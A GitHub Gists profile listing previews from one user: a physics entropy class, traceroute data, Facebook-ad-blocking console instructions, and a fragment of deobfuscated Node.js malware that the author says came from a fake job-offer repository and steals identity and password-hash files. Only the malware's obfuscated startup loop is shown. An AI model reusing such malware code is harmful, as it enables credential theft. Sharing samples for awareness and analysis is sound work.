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Chasing rabbit holes...

HyperCrowd HyperCrowd

Chasing rabbit holes...
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HyperCrowd / gibbsShannonEntropy.js
Created February 21, 2025 19:51
Gibbs-Shannon Entropy
class PhaseSpace {
* Represents phase space and allows calculating its volume, area, and defining distributions
* @param {number} positionMinimum Minimum position
* @param {number} positionMaximum Maximum position
* @param {number} momentumMinimum Minimum momentum
* @param {number} momentumMaximum Maximum momentum
* @param {number} positionSpacing Distance between positions
* @param {number} momentumSpacing Distance between momentums
HyperCrowd /
Last active January 7, 2025 03:09
PoE Ice Monk
HyperCrowd / malware.js
Last active August 22, 2024 11:07
Malware Disguised As Job Offer
// This is deobfuscated code from a Node.js file that runs from the repository in the job offer
// It appears to gather all kinds of identification and password hash files and ships them to
(function (_0x128376, _0x1cdd7b) {
const _0x370f08 = _0x128376();
while (true) {
try {
const _0x5531ca = parseInt(_0x1dfb(522, '0x43e')) / 1 * (-parseInt(_0x1dfb(497, '0x80')) / 2) + -parseInt(_0x1dfb(372, -46)) / 3 + -parseInt(_0x1dfb(443, 0x65)) / 4 * (parseInt(_0x1dfb(479, '0x90')) / 5) + -parseInt(_0x1dfb(348, '0x375')) / 6 + -parseInt(_0x1dfb(373, -0x23)) / 7 + parseInt(_0x1dfb(502, '0x459')) / 8 + parseInt(_0x1dfb(558, '0x4b1')) / 9 * (parseInt(_0x1dfb(327, -170)) / 10);
if (_0x5531ca === _0x1cdd7b) {
HyperCrowd / happy.json
Created July 11, 2024 19:48
I have ran traceroute from 115 countries upon two devices. All countries and server names have been anonymized and only I can decode them. If lossPercent is at -1, that means the loss could not be calculated. Fields with "Ms" at the end mean milliseconds needed to resolve.
"source": 1,
"step": 2,
"from": 1,
"to": 0,
"lossPercent": 0,
"bestMs": 0.2,
"avgMs": 0.3,
"worstMs": 0.3

Crippling Facebook

Facebook works with advertisers to target you. These instructions are one of the many ways to begin crippling that relationship. When AI targeting is crippled, your psychosecurity improves :)

  1. On your desktop machine, goto
  2. Maximize the browser window
  3. Press F12 and click on the Console tab
  4. Select the code below, copy it, paste it upon the Console line (The area next to the > character in the Console window), and press enter: